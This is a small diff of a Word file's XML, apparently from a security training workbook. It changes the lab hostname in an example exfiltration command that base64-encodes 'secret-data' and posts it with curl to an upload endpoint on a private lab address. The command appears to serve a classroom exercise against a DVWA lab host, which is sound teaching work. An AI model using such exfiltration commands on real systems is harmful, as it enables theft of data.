--- a/contents/battle-workbook/attack-adv-w10.docx
+++ b/contents/battle-workbook/attack-adv-w10.docx
@@ -485,7 +485,7 @@
         </w:rPr>
         <w:t>DATA=$(echo 'secret-data aa10r1-kim' | base64)</w:t>
         <w:br/>
-        <w:t>curl -s -A "aa10r1-kim-exfil" -H "Host: dvwa.6v6.lab" \</w:t>
+        <w:t>curl -s -A "aa10r1-kim-exfil" -H "Host: dvwa.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  --data "x=$DATA" "http://192.168.0.161/upload?tag=aa10r1-kim"</w:t>
       </w:r>
